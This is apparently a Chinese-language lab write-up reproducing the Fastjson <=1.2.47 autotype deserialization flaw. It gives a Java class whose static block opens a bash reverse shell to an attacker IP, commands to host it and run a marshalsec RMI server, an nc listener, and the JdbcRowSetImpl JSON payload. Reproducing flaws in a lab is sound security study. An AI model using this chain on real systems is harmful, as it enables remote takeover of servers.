一、漏洞特征
Fastjson提供了autotype功能，允许用户在反序列化数据中通过“@type”指定反序列化的类型，Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法，那么当组件开启了autotype功能并且反序列化不可信数据时，攻击者可以构造数据，使目标应用的代码执行流程进入特定类的特定setter或者getter方法中，若指定类的指定方法中有可被恶意利用的逻辑（也就是通常所指的“Gadget”），则会造成一些严重的安全问题。并且在Fastjson
1.2.47及以下版本中，利用其缓存机制可实现对未开启autotype功能的绕过
影响版本：Fastjson <=1.2.47

访问http://192.168.232.131:8090/即可看到JSON格式的输出

修改用户信息发现有回显

二、漏洞复现
1.编译java文件

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
 
public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/192.168.245.2/2333 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

Ip改成自己攻击机的ip
javac C:\Users\Administrator\Desktop\TouchFile.java
2.开启http服务
把编译好的class文件传到外网系统中，并在class文件所在的目录，Python起一个http服务
python -m http.server 4444

3.启动RMI服务
使用marshalsec项目，启动RMI服务，监听9999端口并加载远程类TouchFile.class
https://github.com/mbechler/marshalsec
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer “http://192.168.245.2:4444/#TouchFile” 9999

4.nc开启监听
另起一个终端开启监听（nc -lvnp 2333）

5.bp发送构造包
访问192.168.232.131:8090并用bp抓包，构造如下POST请求包
{
“a”:{
“@type”:“java.lang.Class”,
“val”:“com.sun.rowset.JdbcRowSetImpl”
},
“b”:{
“@type”:“com.sun.rowset.JdbcRowSetImpl”,
“dataSourceName”:“rmi://192.168.245.2:9999/TouchFile”,
“autoCommit”:true
}
}

6.反弹shell
执行后

注意：如果反弹失败看是不是主机ip搞错了，kali的时间对不对